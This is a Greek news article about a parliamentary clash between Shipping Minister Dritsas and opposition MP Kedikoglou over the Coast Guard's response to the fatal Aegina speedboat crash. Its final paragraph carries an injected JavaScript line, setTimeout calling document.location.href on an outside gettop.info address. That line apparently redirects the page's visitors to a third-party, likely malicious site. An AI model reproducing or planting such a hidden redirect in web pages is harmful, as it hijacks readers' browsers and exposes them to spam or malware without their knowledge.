Ένταση στη Βουλή για την τραγωδία στην Αίγινα

0
3

 

Άγρια αντιπαράθεση σημειώθηκε στη Βουλή ανάμεσα στον υπουργό Ναυτιλίας Θοδωρή Δρίτσα και τον τομεάρχη Ναυτιλίας της ΝΔ Σίμο Κεδίκογλου ο οποίος υπαινίχθηκε συγκάλυψη όσων ευθύνονται για την τραγωδία της Αίγινας, τον περασμένο Αύγουστο, όταν ταχύπλοο σκότωσε τέσσερις ανθρώπους.

Ο κ. Κεδίκογλου ανέφερε πως το μόνο εναέριο μέσο που έσπευσε στην περιοχή ήταν το ελικόπτερο που μετέφερε εκεί τον υπουργό με τη σύζυγό του. Ο κ. Δρίτσας του απάντησε σε έντονο ύφος: «Δεν έχετε δικαίωμα, κύριε Κεδίκογλου να διεκδικείτε πολιτική υπεραξία σε βάρος νεκρών».

«Δεν έχω κανέναν απολύτως λόγο, ούτε εγώ, ούτε η κυβέρνηση, ούτε το Λιμενικό Σώμα, να καλύψουμε κανέναν, να κρύψουμε τίποτα, να κάνουμε οτιδήποτε. Αλλά καταλάβετέ το, δεν είναι δυνατόν να ζητάτε από τον υπουργό να γίνει ανακριτής και εισαγγελέας, ενώ υπάρχει δρομολογημένη ανάκριση αυτή τη στιγμή, που θα απαντήσει σε όλα τα ερωτήματα. Ορθά η πολιτική αγωγή που εκπροσωπεί τους συγγενείς των θυμάτων θέτει τα ερωτήματα στη δικαιοσύνη, θέτει αιτήματα. Κι αυτά η δικαιοσύνη, η ανακριτική διαδικασία, φυσικά και θα τα απαντήσει» είπε ο υπουργός Ναυτιλίας.

«Κάνατε μια αφήγηση αυθαίρετη, δική σας, κατασκευασμένη με δημοσιογραφικά ή άλλα στοιχεία, δήθεν έγκυρη. Μάλιστα, λέει, ότι πήγα με τη σύζυγό μου με ελικόπτερο και το μόνο που έκανε το ελικόπτερο ήταν να με μεταφέρει, όταν το ελικόπτερο αυτό, όπως και του Γενικού Επιτελείου Ναυτικού, από την πρώτη στιγμή συμμετείχε στην έρευνα διάσωσης. Και μόνο αυτό φτάνει. Απορώ, αν θέλετε να μιλήσουμε σ’ αυτό το επίπεδο, μήπως κάποιοι επιδιώκουν να αθωώσουν κάποιους. Απορώ μ’ όλον αυτόν τον ορυμαγδό, μήπως υπάρχει τέτοια σκοπιμότητα να βγουν αθώοι κάποιοι. Εγώ οδήγησα στο κατηγορητήριο ανθρώπους; Εγώ προφυλάκισα κατηγορούμενο; Δεν υπάρχει δικαιοσύνη σ’ αυτή τη διαδικασία; Δεν υπάρχει ανακριτής; Δεν υπάρχει εισαγγελέας; Δεν εποπτεύεται όλη η προανάκριση και η ανάκριση από τον εισαγγελέα;» σημείωσε ο υπουργός.

«Σε μια τραγωδία όπως αυτή της Αίγινας, χρέος μιας ευνομούμενης Πολιτείας είναι η εξακρίβωση των συνθηκών, ο εντοπισμός των υπευθύνων, η απόδοση των ευθυνών. Χρέος της Πολιτείας έναντι των θυμάτων και των συγγενών τους είναι η αλήθεια. Κανονικά η Βουλή δεν θα έπρεπε να ασχολείται με αυτό το ζήτημα. Όμως, επειδή δύο μήνες μετά η αλήθεια, αντί να φωτίζεται, συσκοτίζεται, είναι χρέος μας να ζητήσουμε απαντήσεις» δήλωσε ο κ. Σίμος Κεδίκογλου που προσέθεσε: «Αφήστε αυτήν την καραμέλα περί πολιτικής αξιοποίησης. Εδώ θέλουμε να δούμε τον τρόπο που λειτούργησε το Λιμενικό, αλλά και η φυσική και πολιτική ηγεσία του. Τα ερωτήματα πληθαίνουν και σε αυτό βοηθούν και οι δικές σας δηλώσεις και απαντήσεις στη Βουλή».

Στην επίκληση της πληροφορίας ότι δεν βρέθηκε το DNA του ηλικιωμένου ιδιοκτήτη του σκάφους, ο Θοδωρής Δρίτσας κάλεσε τον κ. Κεδίκογλου να εγκαταλείψει τη βεβαιότητα για το ένα ή το άλλο ενδεχόμενο.

«Το ποιος προσπαθεί να αθωώσει, κύριε υπουργέ, σε αυτήν την υπόθεση, φαίνεται από την ημέρα του δυστυχήματος. Πού ακούστηκε υπουργός να πηγαίνει εκεί πέρα και να κάνει δηλώσεις για τις ικανότητες του δράστη;» σχολίασε ο κ. Κεδίκογλου και προσέθεσε: «Και ο αρχηγός του Λιμενικού έπρεπε να είναι στο Κέντρο Επιχειρήσεων. Και αν η προανάκριση έχει τόσα κενά, ενώ εσείς ήσασταν στο Λιμεναρχείο, γεννώνται εύλογα ερωτήματα».

Ο Θ. Δρίτσας κατηγόρησε τον κ. Κεδίκογλου για τυμβωρυχία όταν ο βουλευτής της ΝΔ έκανε λόγο για ηθική αυτουργία επειδή, όπως είπε, «οι λιμενικοί κάθονταν απαθώς στο λιμάνι και κοιτούσαν». «Η μόνη εντολή που έδωσα ήταν όλες οι πτυχές να διερευνηθούν» είπε ο υπουργός, που υπογράμμισε: «Ποιον έχετε που σας διοχετεύει πληροφορίες ανυπόστατες, στρεβλές; Ποια “πρακτοριλίδικη” ιστορία υπηρετείτε επιτέλους για να παίξετε παιχνιδάκια σε ένα τέτοιο σοβαρό ζήτημα; Είναι να βγαίνεις από τα ρούχα σου ή δεν είναι; Για ποιον λόγο η κυβέρνηση ή το Λιμενικό να έχει λόγο να καλύψει; Αυτά που δημοσιεύτηκαν, ότι ήμουν εγώ πάνω στο σκάφος; Αυτό θέλετε να πείτε; Ή ο κ. Σταθάκης ή ο κ. Φλαμπουράρης; Αυτά θέλετε να πείτε; Τα ενσωματώνετε στη λογική σας;» επεσήμνε σε έντονο ύφος ο υπουργός αν και ο κ. Κεδίκογλου είπε ότι ουδέποτε ισχυρίστηκε κάτι τέτοιο, αλλά θα πρέπει να υπάρξουν απαντήσεις για τη διαχείριση της κατάστασης από το Λιμενικό. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here